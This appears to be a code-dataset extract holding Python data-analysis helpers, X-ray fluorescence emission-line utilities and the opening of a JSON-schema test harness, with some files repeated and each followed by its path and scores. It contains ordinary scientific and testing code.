def inspect_dupes(df, dedupe=False):
'''
Checks duplicates (rows), and gets rid of duplicates if dedupe arg set to 'True'
Arg: dataframe, dedupe (bool)
'''
num_of_dupe = len(df[df.duplicated()])
if dedupe and num_of_dupe>0:
df.drop_duplicates(inplace=True)
print(f'Number of duplicates found: {num_of_dupe}')
return df
else:
print(f'Number of duplicates found: {num_of_dupe}')
return num_of_dupe
def inspect_nans(df):
'''
Check number and percentage of NaN
Arg: dataframe
'''
num_of_nan = df.isnull().sum().sum()
if num_of_nan > 0:
mask_total = df.isnull().sum().sort_values(ascending=False)
number = mask_total[mask_total > 0]
mask_percent = df.isnull().mean().sort_values(ascending=False)
percent = mask_percent[mask_percent > 0]
missing_data = pd.concat([number, percent], axis=1, keys=['Number_of_NaN', 'Percent_of_NaN'])
print(f'Number and Percentage of NaN:\n {missing_data}')
else:
print('No NaN found.')
return num_of_nan
def view_columns_w_many_nans(df, missing_percent=.9):
'''
Checks which columns have over specified percentage of missing
values
Args: dataframe, missing percentage (default=.9)
Returns columns (list)
'''
mask_percent = df.isnull().mean()
series = mask_percent[mask_percent > missing_percent]
columns = series.index.to_list()
print(columns)
return columns
def drop_columns_w_many_nans(df, missing_percent=.9):
'''
Drops the columns whose missing value are bigger than the specified missing percentage
Args: dataframe, missing percentage (default=.9)
Returns dataframe
'''
list_of_cols = view_columns_w_many_nans(df, missing_percent=missing_percent)
df.drop(columns=list_of_cols, inplace=True)
print(list_of_cols, 'Caution: df has been mutated!')
return df
# Adapted from https://www.kaggle.com/dgawlik/house-prices-eda#Categorical-data
# Reference: https://seaborn.pydata.org/tutorial/axis_grids.html
def histograms_numeric_columns(df, numerical_columns):
'''
Args: dataframe, numerical columns (list)
Returns group histagrams
'''
f = pd.melt(df, value_vars=numerical_columns)
g = sns.FacetGrid(f, col='variable', col_wrap=4, sharex=False, sharey=False)
g = g.map(sns.distplot, 'value')
return g
# Adapted from https://www.kaggle.com/dgawlik/house-prices-eda#Categorical-data
def boxplots_categorical_columns(df, categorical_columns, dependant_variable):
'''
Args: dataframe, categorical columns (list), dependant variable (str)
Returns group boxplots of correlations between categorical varibles and dependant variable
'''
def boxplot(x, y, **kwargs):
sns.boxplot(x=x, y=y)
x=plt.xticks(rotation=90)
f = pd.melt(df, id_vars=[dependant_variable], value_vars=categorical_columns)
g = sns.FacetGrid(f, col='variable', col_wrap=2, sharex=False, sharey=False, height=10)
g = g.map(boxplot, 'value', dependant_variable)
return g
def scatter_plots(df, numerical_cols, target_col):
'''
Args: dataframe, numerical columns (list), target column (str)
'''
# Calculate the number of rows
num_rows = (len(numerical_cols) // 3) + 1
# Generate a 3 x n subplots frame
fix, ax = plt.subplots(num_rows, 3, sharey='row', figsize=(15,20))
# Reference: https://stackoverflow.com/a/434328
# Define a function to iterate through a list and divide them into chunks
def chunker(seq, size):
return (seq[pos:pos + size] for pos in range(0, len(seq), size))
# Iterate through numerical_cols and generate each subplot
for y, plot_group in enumerate(chunker((numerical_cols), 3)):
for x, col in enumerate(plot_group):
sub_ax = ax[y][x]
sub_ax.scatter(df[col], df[target_col], s=2)
sub_ax.set_title(col)
def heatmap_numeric_w_dependent_variable(df, dependent_variable):
'''
Args: dataframe, dependant variable (str)
Returns heatmap of independent variables' correlations with dependent variable
'''
plt.figure(figsize=(8, 10))
g = sns.heatmap(df.corr()[[dependent_variable]].sort_values(by=dependent_variable),
annot=True,
cmap='coolwarm',
vmin=-1,
vmax=1)
return g
def high_corr_w_dependent_variable(df, dependent_variable, corr_value):
'''
Args: dataframe, dependent variable (str), and value of correlation (float)
Returns dataframe of independant varibles that are highly (e.g. abs(corr) > 0.4) with dependent varible
'''
temp_df = df.corr()[[dependent_variable]].sort_values(by=dependent_variable, ascending=False)
mask_1 = abs(temp_df[dependent_variable]) > corr_value
return temp_df.loc[mask_1]
def high_corr_among_independent_variable(df, dependent_variable, corr_value):
'''
Checks correlation among independant varibles, and checks which two features have strong correlation
Args: dataframe, dependent variable, and value of correlation
Returns dictionary
'''
df_corr = df.drop(columns=[dependent_variable]).corr()
corr_dict = df_corr.to_dict()
temp_dict = {key_1: {key_2 : value
for key_2, value in imbeded_dictionary.items()
if abs(value) < 1 and abs(value) > corr_value}
for key_1, imbeded_dictionary in corr_dict.items()}
return {k:v for k, v in temp_dict.items() if v}
def categorical_to_ordinal_transformer(categories):
'''
Returns a function that will map categories to ordinal values based on the
order of the list of `categories` given.
Example:
If categories is ['A', 'B', 'C'] then the transformer will map
'A' -> 0, 'B' -> 1, 'C' -> 2.
'''
return lambda categorical_value: categories.index(categorical_value)
def transform_categorical_to_numercial(df, categorical_numerical_mapping):
'''
Transforms categorical columns to numerical columns
Args: dataframe, dictionary
Returns dataframe
'''
transformers = {k: categorical_to_ordinal_transformer(v)
for k, v in categorical_numerical_mapping.items()}
new_df = df.copy()
for col, transformer in transformers.items():
new_df[col] = new_df[col].map(transformer).astype('int64')
return new_df
def dummify_categorical_columns(df):
'''
Dummifies all categorical columns
Args: dataframe
Returns dataframe
'''
categorical_columns = df.select_dtypes(include="object").columns
return pd.get_dummies(df, columns=categorical_columns, drop_first=True)
def conform_columns(df_reference, df):
'''
Drops columns in dataframe that are not in the reference dataframe
Args: dataframe as reference, dataframe
Returns dataframe
'''
to_drop = [c for c in df.columns if c not in df_reference.columns]
return df.drop(to_drop, axis=1)
def viz_resids(model_title, X, y, random_state_number=42):
'''
Thanks to <NAME> for creating this visualization function!
Args: model title (str), X(features), y(target)
Returns 3 error plots
'''
# For help with multiple figures: https://matplotlib.org/3.1.1/gallery/subplots_axes_and_figures/subplots_demo.html
# HANDLING DATA
# train/test split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=random_state_number)
# instatiate model
lr = LinearRegression()
# fit model
lr.fit(X_train, y_train)
preds = lr.predict(X_test)
resids = y_test - preds
target_name = y.name.capitalize()
# HANDLING SUBPLOTS
fig, axes = plt.subplots(2, 2, figsize=(12,10)) # 2 row x 2 columns
fig.suptitle(f"{model_title}: $R^2$ test ={lr.score(X_test, y_test):2.2%}", fontsize = 24, y = 1.05)
ax_1 = axes[0][0]
ax_2 = axes[0][1]
ax_3 = axes[1][0]
subplot_title_size = 18
subplot_label_size = 14
# 1ST PLOT - y_true vs. y_pred
ax_1.set_title("True Values ($y$) vs. Predictions ($\hat{y}$)", fontsize = subplot_title_size, pad = 10)
maxDist = max(max(preds),max(y)) # maxiumum value used to determin x_lim and y_lim
minDist = min(min(preds),min(y)) # maxiumum value used to determin x_lim and y_lim
# 45deg line, signifying prediction == true value
ax_1.plot((minDist,maxDist),(minDist,maxDist), c = "r", alpha = .7);
sns.scatterplot(ax = ax_1, x = y_test, y = preds, alpha = .5)
ax_1.set_xlabel("True Values ($y$)", fontsize = subplot_label_size, labelpad = 10)
ax_1.set_ylabel("Predictions ($\hat{y}$)", fontsize = subplot_label_size, labelpad = 10)
# 2ND PLOT - residuals
ax_2.set_title("Residuals", fontsize = subplot_title_size)
sns.scatterplot(ax = ax_2, x = range(len(resids)),y = resids, alpha = .5)
ax_2.set_ylabel(target_name, fontsize = subplot_label_size)
ax_2.axhline(0, c = "r", alpha = .7);
# 3RD PLOT - residuals histogram
ax_3.set_title("Histogram of residuals", fontsize = subplot_title_size)
sns.distplot(resids, ax = ax_3, kde = False);
ax_3.set_xlabel(target_name, fontsize = subplot_label_size)
ax_3.set_ylabel("Frequency", fontsize = subplot_label_size)
plt.tight_layout() # handles most overlaping and spacing issues
def print_error_metrics(y_true, y_preds, n, k):
'''
Args: y_true, y_preds,
n: the number of observations.
k: the number of independent variables, excluding the constant.
Returns 6 error metrics
'''
def r2_adj(y_true, y_preds, n, k):
rss = np.sum((y_true - y_preds)**2)
null_model = np.sum((y_true - np.mean(y_true))**2)
r2 = 1 - rss/null_model
r2_adj = 1 - ((1-r2)*(n-1))/(n-k-1)
return r2_adj
print('Mean Square Error: ', mean_squared_error(y_true, y_preds))
print('Root Mean Square Error: ', np.sqrt(mean_squared_error(y_true, y_preds)))
print('Mean absolute error: ', mean_absolute_error(y_true, y_preds))
print('Median absolute error: ', median_absolute_error(y_true, y_preds))
print('R^2 score:', r2_score(y_true, y_preds))
print('Adjusted R^2 score:', r2_adj(y_true, y_preds, n, k))
|
eda_and_beyond/eda_tools.py
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.linear_model import LinearRegression, LassoCV, RidgeCV
from sklearn.model_selection import cross_val_score, train_test_split
from sklearn.preprocessing import StandardScaler, PolynomialFeatures
from sklearn.metrics import mean_squared_error, mean_absolute_error, median_absolute_error, r2_score
from sklearn.dummy import DummyRegressor
"""
NAME
eda_tools
DESCRIPTION
This module provides functions to automate common procedures in EDA, model
preparation, and data visualization process.
MODULE CONTENTS
inspect_dupes
inspect_nans
view_columns_w_many_nans
drop_columns_w_many_nans
histograms_numeric_columns
boxplots_categorical_columns
scatter_plots
heatmap_numeric_w_dependent_variable
high_corr_w_dependent_variable
high_corr_among_independent_variable
categorical_to_ordinal_transformer
transform_categorical_to_numercial
dummify_categorical_columns
conform_columns
viz_resids
print_error_metrics
"""
def inspect_dupes(df, dedupe=False):
'''
Checks duplicates (rows), and gets rid of duplicates if dedupe arg set to 'True'
Arg: dataframe, dedupe (bool)
'''
num_of_dupe = len(df[df.duplicated()])
if dedupe and num_of_dupe>0:
df.drop_duplicates(inplace=True)
print(f'Number of duplicates found: {num_of_dupe}')
return df
else:
print(f'Number of duplicates found: {num_of_dupe}')
return num_of_dupe
def inspect_nans(df):
'''
Check number and percentage of NaN
Arg: dataframe
'''
num_of_nan = df.isnull().sum().sum()
if num_of_nan > 0:
mask_total = df.isnull().sum().sort_values(ascending=False)
number = mask_total[mask_total > 0]
mask_percent = df.isnull().mean().sort_values(ascending=False)
percent = mask_percent[mask_percent > 0]
missing_data = pd.concat([number, percent], axis=1, keys=['Number_of_NaN', 'Percent_of_NaN'])
print(f'Number and Percentage of NaN:\n {missing_data}')
else:
print('No NaN found.')
return num_of_nan
def view_columns_w_many_nans(df, missing_percent=.9):
'''
Checks which columns have over specified percentage of missing
values
Args: dataframe, missing percentage (default=.9)
Returns columns (list)
'''
mask_percent = df.isnull().mean()
series = mask_percent[mask_percent > missing_percent]
columns = series.index.to_list()
print(columns)
return columns
def drop_columns_w_many_nans(df, missing_percent=.9):
'''
Drops the columns whose missing value are bigger than the specified missing percentage
Args: dataframe, missing percentage (default=.9)
Returns dataframe
'''
list_of_cols = view_columns_w_many_nans(df, missing_percent=missing_percent)
df.drop(columns=list_of_cols, inplace=True)
print(list_of_cols, 'Caution: df has been mutated!')
return df
# Adapted from https://www.kaggle.com/dgawlik/house-prices-eda#Categorical-data
# Reference: https://seaborn.pydata.org/tutorial/axis_grids.html
def histograms_numeric_columns(df, numerical_columns):
'''
Args: dataframe, numerical columns (list)
Returns group histagrams
'''
f = pd.melt(df, value_vars=numerical_columns)
g = sns.FacetGrid(f, col='variable', col_wrap=4, sharex=False, sharey=False)
g = g.map(sns.distplot, 'value')
return g
# Adapted from https://www.kaggle.com/dgawlik/house-prices-eda#Categorical-data
def boxplots_categorical_columns(df, categorical_columns, dependant_variable):
'''
Args: dataframe, categorical columns (list), dependant variable (str)
Returns group boxplots of correlations between categorical varibles and dependant variable
'''
def boxplot(x, y, **kwargs):
sns.boxplot(x=x, y=y)
x=plt.xticks(rotation=90)
f = pd.melt(df, id_vars=[dependant_variable], value_vars=categorical_columns)
g = sns.FacetGrid(f, col='variable', col_wrap=2, sharex=False, sharey=False, height=10)
g = g.map(boxplot, 'value', dependant_variable)
return g
def scatter_plots(df, numerical_cols, target_col):
'''
Args: dataframe, numerical columns (list), target column (str)
'''
# Calculate the number of rows
num_rows = (len(numerical_cols) // 3) + 1
# Generate a 3 x n subplots frame
fix, ax = plt.subplots(num_rows, 3, sharey='row', figsize=(15,20))
# Reference: https://stackoverflow.com/a/434328
# Define a function to iterate through a list and divide them into chunks
def chunker(seq, size):
return (seq[pos:pos + size] for pos in range(0, len(seq), size))
# Iterate through numerical_cols and generate each subplot
for y, plot_group in enumerate(chunker((numerical_cols), 3)):
for x, col in enumerate(plot_group):
sub_ax = ax[y][x]
sub_ax.scatter(df[col], df[target_col], s=2)
sub_ax.set_title(col)
def heatmap_numeric_w_dependent_variable(df, dependent_variable):
'''
Args: dataframe, dependant variable (str)
Returns heatmap of independent variables' correlations with dependent variable
'''
plt.figure(figsize=(8, 10))
g = sns.heatmap(df.corr()[[dependent_variable]].sort_values(by=dependent_variable),
annot=True,
cmap='coolwarm',
vmin=-1,
vmax=1)
return g
def high_corr_w_dependent_variable(df, dependent_variable, corr_value):
'''
Args: dataframe, dependent variable (str), and value of correlation (float)
Returns dataframe of independant varibles that are highly (e.g. abs(corr) > 0.4) with dependent varible
'''
temp_df = df.corr()[[dependent_variable]].sort_values(by=dependent_variable, ascending=False)
mask_1 = abs(temp_df[dependent_variable]) > corr_value
return temp_df.loc[mask_1]
def high_corr_among_independent_variable(df, dependent_variable, corr_value):
'''
Checks correlation among independant varibles, and checks which two features have strong correlation
Args: dataframe, dependent variable, and value of correlation
Returns dictionary
'''
df_corr = df.drop(columns=[dependent_variable]).corr()
corr_dict = df_corr.to_dict()
temp_dict = {key_1: {key_2 : value
for key_2, value in imbeded_dictionary.items()
if abs(value) < 1 and abs(value) > corr_value}
for key_1, imbeded_dictionary in corr_dict.items()}
return {k:v for k, v in temp_dict.items() if v}
def categorical_to_ordinal_transformer(categories):
'''
Returns a function that will map categories to ordinal values based on the
order of the list of `categories` given.
Example:
If categories is ['A', 'B', 'C'] then the transformer will map
'A' -> 0, 'B' -> 1, 'C' -> 2.
'''
return lambda categorical_value: categories.index(categorical_value)
def transform_categorical_to_numercial(df, categorical_numerical_mapping):
'''
Transforms categorical columns to numerical columns
Args: dataframe, dictionary
Returns dataframe
'''
transformers = {k: categorical_to_ordinal_transformer(v)
for k, v in categorical_numerical_mapping.items()}
new_df = df.copy()
for col, transformer in transformers.items():
new_df[col] = new_df[col].map(transformer).astype('int64')
return new_df
def dummify_categorical_columns(df):
'''
Dummifies all categorical columns
Args: dataframe
Returns dataframe
'''
categorical_columns = df.select_dtypes(include="object").columns
return pd.get_dummies(df, columns=categorical_columns, drop_first=True)
def conform_columns(df_reference, df):
'''
Drops columns in dataframe that are not in the reference dataframe
Args: dataframe as reference, dataframe
Returns dataframe
'''
to_drop = [c for c in df.columns if c not in df_reference.columns]
return df.drop(to_drop, axis=1)
def viz_resids(model_title, X, y, random_state_number=42):
'''
Thanks to <NAME> for creating this visualization function!
Args: model title (str), X(features), y(target)
Returns 3 error plots
'''
# For help with multiple figures: https://matplotlib.org/3.1.1/gallery/subplots_axes_and_figures/subplots_demo.html
# HANDLING DATA
# train/test split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=random_state_number)
# instatiate model
lr = LinearRegression()
# fit model
lr.fit(X_train, y_train)
preds = lr.predict(X_test)
resids = y_test - preds
target_name = y.name.capitalize()
# HANDLING SUBPLOTS
fig, axes = plt.subplots(2, 2, figsize=(12,10)) # 2 row x 2 columns
fig.suptitle(f"{model_title}: $R^2$ test ={lr.score(X_test, y_test):2.2%}", fontsize = 24, y = 1.05)
ax_1 = axes[0][0]
ax_2 = axes[0][1]
ax_3 = axes[1][0]
subplot_title_size = 18
subplot_label_size = 14
# 1ST PLOT - y_true vs. y_pred
ax_1.set_title("True Values ($y$) vs. Predictions ($\hat{y}$)", fontsize = subplot_title_size, pad = 10)
maxDist = max(max(preds),max(y)) # maxiumum value used to determin x_lim and y_lim
minDist = min(min(preds),min(y)) # maxiumum value used to determin x_lim and y_lim
# 45deg line, signifying prediction == true value
ax_1.plot((minDist,maxDist),(minDist,maxDist), c = "r", alpha = .7);
sns.scatterplot(ax = ax_1, x = y_test, y = preds, alpha = .5)
ax_1.set_xlabel("True Values ($y$)", fontsize = subplot_label_size, labelpad = 10)
ax_1.set_ylabel("Predictions ($\hat{y}$)", fontsize = subplot_label_size, labelpad = 10)
# 2ND PLOT - residuals
ax_2.set_title("Residuals", fontsize = subplot_title_size)
sns.scatterplot(ax = ax_2, x = range(len(resids)),y = resids, alpha = .5)
ax_2.set_ylabel(target_name, fontsize = subplot_label_size)
ax_2.axhline(0, c = "r", alpha = .7);
# 3RD PLOT - residuals histogram
ax_3.set_title("Histogram of residuals", fontsize = subplot_title_size)
sns.distplot(resids, ax = ax_3, kde = False);
ax_3.set_xlabel(target_name, fontsize = subplot_label_size)
ax_3.set_ylabel("Frequency", fontsize = subplot_label_size)
plt.tight_layout() # handles most overlaping and spacing issues
def print_error_metrics(y_true, y_preds, n, k):
'''
Args: y_true, y_preds,
n: the number of observations.
k: the number of independent variables, excluding the constant.
Returns 6 error metrics
'''
def r2_adj(y_true, y_preds, n, k):
rss = np.sum((y_true - y_preds)**2)
null_model = np.sum((y_true - np.mean(y_true))**2)
r2 = 1 - rss/null_model
r2_adj = 1 - ((1-r2)*(n-1))/(n-k-1)
return r2_adj
print('Mean Square Error: ', mean_squared_error(y_true, y_preds))
print('Root Mean Square Error: ', np.sqrt(mean_squared_error(y_true, y_preds)))
print('Mean absolute error: ', mean_absolute_error(y_true, y_preds))
print('Median absolute error: ', median_absolute_error(y_true, y_preds))
print('R^2 score:', r2_score(y_true, y_preds))
print('Adjusted R^2 score:', r2_adj(y_true, y_preds, n, k))
| 0.594669 | 0.611875 |
import re
import xraylib
from skbeam.core.constants import XrfElement as Element
from skbeam.core.fitting.xrf_model import K_LINE, L_LINE, M_LINE
def get_element_atomic_number(element_str):
r"""
A wrapper to ``SymbolToAtomicNumber`` function from ``xraylib``.
Returns atomic number for the sybmolic element name (e.g. ``C`` or ``Fe``).
Parameters
----------
element_str: str
sybmolic representation of an element
Returns
-------
Atomic number of the element ``element_str``. If element is invalid, then
the function returns 0.
"""
xraylib.SetErrorMessages(0) # Turn off error messages from ``xraylib``
try:
val = xraylib.SymbolToAtomicNumber(element_str)
except ValueError:
# Imitate the behavior of xraylib 3
val = 0
return val
def validate_element_str(element_str):
r"""
Checks if ``element_str`` is valid representation of an element according to
standard notation for chemical formulas. Valid representation of elements can
be processed by ``xraylib`` tools. This functions attempts to find the atomic
number for the element and returns ``True`` if it succeeds and ``False`` if
it fails.
Parameters
----------
element_str: str
sybmolic representation of an element
Returns
-------
``True`` if ``element_str`` is valid representation of an element and ``False``
otherwise.
"""
if get_element_atomic_number(element_str):
return True
else:
return False
def parse_compound_formula(compound_formula):
r"""
Parses the chemical formula of a compound and returns the dictionary,
which contains element name, atomic number, number of atoms and mass fraction
in the compound.
Parameters
----------
compound_formula: str
chemical formula of the compound in the form ``FeO2``, ``CO2`` or ``Fe``.
Element names must start with capital letter.
Returns
-------
dictionary of dictionaries, data on each element in the compound: key -
sybolic element name, value - a dictionary that contains ``AtomicNumber``,
``nAtoms`` and ``massFraction`` of the element. The elements are sorted
in the order of growing atomic number.
Raises
------
RuntimeError is raised if compound formula cannot be parsed
"""
xraylib.SetErrorMessages(0) # This is supposed to stop XRayLib from printing
# internal error messages, but it doesn't work
try:
compound_data = xraylib.CompoundParser(compound_formula)
except (SystemError, ValueError):
msg = f"Invalid chemical formula '{compound_formula}' is passed, parsing failed"
raise RuntimeError(msg)
# Now create more manageable structure
compound_dict = {}
for e_an, e_mf, e_na in zip(compound_data["Elements"],
compound_data["massFractions"],
compound_data["nAtoms"]):
e_name = xraylib.AtomicNumberToSymbol(e_an)
compound_dict[e_name] = {"AtomicNumber": e_an,
"nAtoms": e_na,
"massFraction": e_mf}
return compound_dict
def split_compound_mass(compound_formula, compound_mass):
r"""
Computes mass of each element in the compound given total mass of the compound
Parameters
----------
compound_formula: str
chemical formula of the compound in the form ``FeO2``, ``CO2`` or ``Fe``.
Element names must start with capital letter.
compound_mass: float
total mass of the compound
Returns
-------
dictionary: key - symbolic element name, value - mass of the element
Raises
------
RuntimeError is raised if compound formula cannot be parsed
"""
compound_dict = parse_compound_formula(compound_formula)
element_dict = {}
for el_name, el_info in compound_dict.items():
element_dict[el_name] = el_info["massFraction"] * compound_mass
return element_dict
def get_supported_eline_list(*, lines=None):
"""
Returns the list of the emission lines supported by ``scikit-beam``
Parameters
----------
lines : list(str)
tuple or list of strings, that defines, which emission lines are going to be included
in the output list (e.g. ``("K",)`` or ``("L", "M")`` etc.) If ``None`` (default),
then K, L and M lines are going to be included.
Returns
-------
the list of supported emission line. The lines are in the format ``"Fe_K"`` or ``"Mg_M"``.
"""
if lines is None:
lines = ("K", "L", "M")
eline_list = []
if "K" in lines:
eline_list += K_LINE
if "L" in lines:
eline_list += L_LINE
if "M" in lines:
eline_list += M_LINE
return eline_list
def check_if_eline_supported(eline_name, *, lines=None):
"""
Check if the emission line name is in the list of supported names.
Emission name must be in the format: K_K, Fe_K etc. The list includes K, L and M lines.
The function is case-sensitive.
Parameters
----------
eline_name : str
name of the emission line (K_K, Fe_K etc. for valid emission line). In general
the string may contain arbitrary sequence characters, may be empty or None. The
function will return True only if the sequence represents emission line from
the list of supported emission lines.
lines : list(str)
tuple or list of strings, that defines, which emission lines are going to be included
in the output list (e.g. ``("K",)`` or ``("L", "M")`` etc.) If ``None`` (default),
then K, L and M lines are going to be included.
Returns
True if ``eline_name`` is in the list of supported emission lines, False otherwise
"""
if not eline_name or not isinstance(eline_name, str):
return False
if eline_name in get_supported_eline_list(lines=lines):
return True
else:
return False
def check_if_eline_is_activated(elemental_line, incident_energy):
"""
Checks if emission line is activated at given incident beam energy
Parameters
----------
elemental_line : str
emission line in the format K_K or Fe_K
incident_energy : float
incident energy in keV
Returns
-------
bool value, indicating if the emission line is activated
"""
# Check if the emission line has correct format
if not re.search(r"^[A-Z][a-z]?_[KLM]([ab]\d?)?$", elemental_line):
raise RuntimeError(f"Elemental line {elemental_line} is improperly formatted")
# The validation of 'elemental_line' is strict enough to do the rest of the processing
# without further checks.
[element, line] = elemental_line.split('_')
line = line.lower()
if len(line) == 1:
line += 'a1'
elif len(line) == 1:
line += "1"
e = Element(element)
if e.cs(incident_energy)[line] == 0:
return False
else:
return True
def generate_eline_list(element_list, *, incident_energy, lines=None):
r"""
Generate a list of emission lines based on the list of elements (``element_list``)
and incident energy. Only the emission lines that are supported by ``scikit-beam``
and activated by the incident energy are included in the list.
Parameters
----------
element_list: list(str)
list of valid element names (e.g. ["S", "Al", "Fe"])
incident_energy: float
incident beam energy, keV
lines: list(str)
tuple or list of strings, that defines, which classes of emission lines to include
in the output list (e.g. ``("K",)`` or ``("L", "M")`` etc.) If ``None`` (default),
then K, L and M lines are going to be included.
Returns
-------
list(str) - the list of emission lines
Raises
------
RuntimeError is raised if 'lines' contains incorrect specification of emission line class.
"""
if lines is None:
# By default lines "K", "L" and "M" are included in the output list
lines = ("K", "L", "M")
# Verify line selection
invalid_lines = []
for l in lines:
if not re.search(r"^[KLM]$", l):
invalid_lines.append(l)
if invalid_lines:
msg = f"Some of the selected emission lines are incorrect: {invalid_lines}"
raise RuntimeError(msg)
eline_list = []
for element in element_list:
for l in lines:
eline = f"{element}_{l}"
is_activated = check_if_eline_is_activated(eline, incident_energy)
is_supported = check_if_eline_supported(eline)
if is_activated and is_supported:
eline_list.append(eline)
return eline_list
|
pyxrf/core/xrf_utils.py
|
import re
import xraylib
from skbeam.core.constants import XrfElement as Element
from skbeam.core.fitting.xrf_model import K_LINE, L_LINE, M_LINE
def get_element_atomic_number(element_str):
r"""
A wrapper to ``SymbolToAtomicNumber`` function from ``xraylib``.
Returns atomic number for the sybmolic element name (e.g. ``C`` or ``Fe``).
Parameters
----------
element_str: str
sybmolic representation of an element
Returns
-------
Atomic number of the element ``element_str``. If element is invalid, then
the function returns 0.
"""
xraylib.SetErrorMessages(0) # Turn off error messages from ``xraylib``
try:
val = xraylib.SymbolToAtomicNumber(element_str)
except ValueError:
# Imitate the behavior of xraylib 3
val = 0
return val
def validate_element_str(element_str):
r"""
Checks if ``element_str`` is valid representation of an element according to
standard notation for chemical formulas. Valid representation of elements can
be processed by ``xraylib`` tools. This functions attempts to find the atomic
number for the element and returns ``True`` if it succeeds and ``False`` if
it fails.
Parameters
----------
element_str: str
sybmolic representation of an element
Returns
-------
``True`` if ``element_str`` is valid representation of an element and ``False``
otherwise.
"""
if get_element_atomic_number(element_str):
return True
else:
return False
def parse_compound_formula(compound_formula):
r"""
Parses the chemical formula of a compound and returns the dictionary,
which contains element name, atomic number, number of atoms and mass fraction
in the compound.
Parameters
----------
compound_formula: str
chemical formula of the compound in the form ``FeO2``, ``CO2`` or ``Fe``.
Element names must start with capital letter.
Returns
-------
dictionary of dictionaries, data on each element in the compound: key -
sybolic element name, value - a dictionary that contains ``AtomicNumber``,
``nAtoms`` and ``massFraction`` of the element. The elements are sorted
in the order of growing atomic number.
Raises
------
RuntimeError is raised if compound formula cannot be parsed
"""
xraylib.SetErrorMessages(0) # This is supposed to stop XRayLib from printing
# internal error messages, but it doesn't work
try:
compound_data = xraylib.CompoundParser(compound_formula)
except (SystemError, ValueError):
msg = f"Invalid chemical formula '{compound_formula}' is passed, parsing failed"
raise RuntimeError(msg)
# Now create more manageable structure
compound_dict = {}
for e_an, e_mf, e_na in zip(compound_data["Elements"],
compound_data["massFractions"],
compound_data["nAtoms"]):
e_name = xraylib.AtomicNumberToSymbol(e_an)
compound_dict[e_name] = {"AtomicNumber": e_an,
"nAtoms": e_na,
"massFraction": e_mf}
return compound_dict
def split_compound_mass(compound_formula, compound_mass):
r"""
Computes mass of each element in the compound given total mass of the compound
Parameters
----------
compound_formula: str
chemical formula of the compound in the form ``FeO2``, ``CO2`` or ``Fe``.
Element names must start with capital letter.
compound_mass: float
total mass of the compound
Returns
-------
dictionary: key - symbolic element name, value - mass of the element
Raises
------
RuntimeError is raised if compound formula cannot be parsed
"""
compound_dict = parse_compound_formula(compound_formula)
element_dict = {}
for el_name, el_info in compound_dict.items():
element_dict[el_name] = el_info["massFraction"] * compound_mass
return element_dict
def get_supported_eline_list(*, lines=None):
"""
Returns the list of the emission lines supported by ``scikit-beam``
Parameters
----------
lines : list(str)
tuple or list of strings, that defines, which emission lines are going to be included
in the output list (e.g. ``("K",)`` or ``("L", "M")`` etc.) If ``None`` (default),
then K, L and M lines are going to be included.
Returns
-------
the list of supported emission line. The lines are in the format ``"Fe_K"`` or ``"Mg_M"``.
"""
if lines is None:
lines = ("K", "L", "M")
eline_list = []
if "K" in lines:
eline_list += K_LINE
if "L" in lines:
eline_list += L_LINE
if "M" in lines:
eline_list += M_LINE
return eline_list
def check_if_eline_supported(eline_name, *, lines=None):
"""
Check if the emission line name is in the list of supported names.
Emission name must be in the format: K_K, Fe_K etc. The list includes K, L and M lines.
The function is case-sensitive.
Parameters
----------
eline_name : str
name of the emission line (K_K, Fe_K etc. for valid emission line). In general
the string may contain arbitrary sequence characters, may be empty or None. The
function will return True only if the sequence represents emission line from
the list of supported emission lines.
lines : list(str)
tuple or list of strings, that defines, which emission lines are going to be included
in the output list (e.g. ``("K",)`` or ``("L", "M")`` etc.) If ``None`` (default),
then K, L and M lines are going to be included.
Returns
True if ``eline_name`` is in the list of supported emission lines, False otherwise
"""
if not eline_name or not isinstance(eline_name, str):
return False
if eline_name in get_supported_eline_list(lines=lines):
return True
else:
return False
def check_if_eline_is_activated(elemental_line, incident_energy):
"""
Checks if emission line is activated at given incident beam energy
Parameters
----------
elemental_line : str
emission line in the format K_K or Fe_K
incident_energy : float
incident energy in keV
Returns
-------
bool value, indicating if the emission line is activated
"""
# Check if the emission line has correct format
if not re.search(r"^[A-Z][a-z]?_[KLM]([ab]\d?)?$", elemental_line):
raise RuntimeError(f"Elemental line {elemental_line} is improperly formatted")
# The validation of 'elemental_line' is strict enough to do the rest of the processing
# without further checks.
[element, line] = elemental_line.split('_')
line = line.lower()
if len(line) == 1:
line += 'a1'
elif len(line) == 1:
line += "1"
e = Element(element)
if e.cs(incident_energy)[line] == 0:
return False
else:
return True
def generate_eline_list(element_list, *, incident_energy, lines=None):
r"""
Generate a list of emission lines based on the list of elements (``element_list``)
and incident energy. Only the emission lines that are supported by ``scikit-beam``
and activated by the incident energy are included in the list.
Parameters
----------
element_list: list(str)
list of valid element names (e.g. ["S", "Al", "Fe"])
incident_energy: float
incident beam energy, keV
lines: list(str)
tuple or list of strings, that defines, which classes of emission lines to include
in the output list (e.g. ``("K",)`` or ``("L", "M")`` etc.) If ``None`` (default),
then K, L and M lines are going to be included.
Returns
-------
list(str) - the list of emission lines
Raises
------
RuntimeError is raised if 'lines' contains incorrect specification of emission line class.
"""
if lines is None:
# By default lines "K", "L" and "M" are included in the output list
lines = ("K", "L", "M")
# Verify line selection
invalid_lines = []
for l in lines:
if not re.search(r"^[KLM]$", l):
invalid_lines.append(l)
if invalid_lines:
msg = f"Some of the selected emission lines are incorrect: {invalid_lines}"
raise RuntimeError(msg)
eline_list = []
for element in element_list:
for l in lines:
eline = f"{element}_{l}"
is_activated = check_if_eline_is_activated(eline, incident_energy)
is_supported = check_if_eline_supported(eline)
if is_activated and is_supported:
eline_list.append(eline)
return eline_list
| 0.891138 | 0.637031 |
import json
import os
import random
import socket
import subprocess
import sys
from time import sleep
from urllib.parse import urlparse
import pytest
import jsonschema_rs
TEST_SUITE_PATH = "../../jsonschema/tests/suite"
EXPONENTIAL_BASE = 2
JITTER = (0.0, 0.5)
INITIAL_RETRY_DELAY = 0.05
MAX_WAITING_RETRIES = 10
def is_available(url: str) -> bool:
"""Whether the `url` is available for connection or not."""
parsed = urlparse(url)
try:
with socket.create_connection((parsed.hostname, parsed.port or 80)):
return True
except ConnectionError:
return False
def wait_until_responsive(url: str, retries: int = MAX_WAITING_RETRIES, delay: float = INITIAL_RETRY_DELAY) -> None:
while retries > 0:
if is_available(url):
return
retries -= 1
